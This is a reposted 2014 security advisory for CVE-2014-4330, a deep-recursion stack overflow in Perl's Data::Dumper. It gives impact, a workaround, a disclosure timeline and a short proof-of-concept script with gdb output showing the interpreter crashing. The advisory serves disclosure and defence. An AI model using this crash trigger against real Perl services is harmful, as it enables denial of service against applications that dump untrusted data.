首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Perl 5.20.1 Deep Recursion Stack Overflow Vulnerability
来源:https://www.lsexperts.de 作者:Vervier 发布时间:2014-09-26  
Perl CORE - Deep Recursion Stack Overflow
-----------------------------------------
  
Affected Versions
=================
Perl v5.20.1 and below
  
  
Issue Overview
==============
Vulnerability Type: Stack Overflow
Technical Risk: high
Likelihood of Exploitation: low
Vendor: Perl
Vendor URL: http://www.perl.org
Credits: LSE Leading Security Experts GmbH employee Markus Vervier
Advisory Status: Public
CVE-Number: CVE-2014-4330
  
  
Impact
======
When the runtime stack grows over its maximal size, a guard page on most modern
operating systems is hit causing the Perl interpreter to crash.
Depending on context code execution on some architectures might be possible
if certain conditions are met.
  
  
Issue Description
=================
During internal development a stack overflow was discovered when serializing
data via the Data::Dumper extension which is part of Perl-Core.
By using the "Dumper" method on a large Array-Reference which recursively
contains other Array-References, it is possible to cause many recursive
calls to the DD_dump native function and ultimately exhaust all available stack
memory.
  
  
Temporary Workaround and Fix
============================
Applications written in Perl should ensure that a sanity check on data
serialized by Data::Dumper is performed.
  
According to the vendor a patch is available and coordinated with downstream
vendors.
  
  
Proof of Concept
================
$ cat min.pl
use strict;
use Data::Dumper;
  
my $dumpme = [];
for (my $i = 0; $i < $ARGV[0]; $i++) {
  $dumpme = [$dumpme, "AAAAAAAA"];
}
print Dumper($dumpme);
  
$ gdb --args perl min.pl 20000
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
Reading symbols from /usr/bin/perl...Reading symbols from
/usr/lib/debug/usr/bin/perl...done.
done.
(gdb) run
Starting program: /usr/bin/perl min.pl 20000
warning: no loadable sections found in added symbol-file system-supplied
DSO at
0x7ffff7ffa000
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
  
Program received signal SIGSEGV, Segmentation fault.
_IO_vfprintf_internal (s=0x7fffff7ff5c0, format=0x7ffff6bf5f89 "%ld",
    ap=0x7fffff7ff6f0) at vfprintf.c:1328
1328  vfprintf.c: No such file or directory.
  
It was confirmed that the overflow can be triggered via the XML::Parser
extension when parsing and dumping specially crafted XML-Documents.
  
  
History
=======
2014-06-10 Issue discovery during internal development
2014-06-11 Vendor contacted
2014-06-11 Vendor reply
2014-06-13 CVE requested
2014-07-01 Vulnerability confirmed by vendor
2014-07-02 CVE-2014-4330 assigned
2014-09-25 Advisory released
  
GPG Signature
=============
This advisory is signed with the GPG key of the
LSE Leading Security Experts GmbH advisories team.
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mac OS X VMWare Fusion Root Pr
·Nucom ADSL ADSLR5000UN ISP Cre
·Apache mod_cgi Bash Environmen
·GNU bash Environment Variable
·DHCP Client Bash Environment V
·GNU bash Environment Variable
·Gnu Bash 4.3 CGI Scan Remote C
·Gnu Bash 4.3 CGI REFERER Comma
·Bash Environment Variable Comm
·Dhclient Bash Environment Vari
·Bash Code Injection Proof Of C
·bash代码注入的安全漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved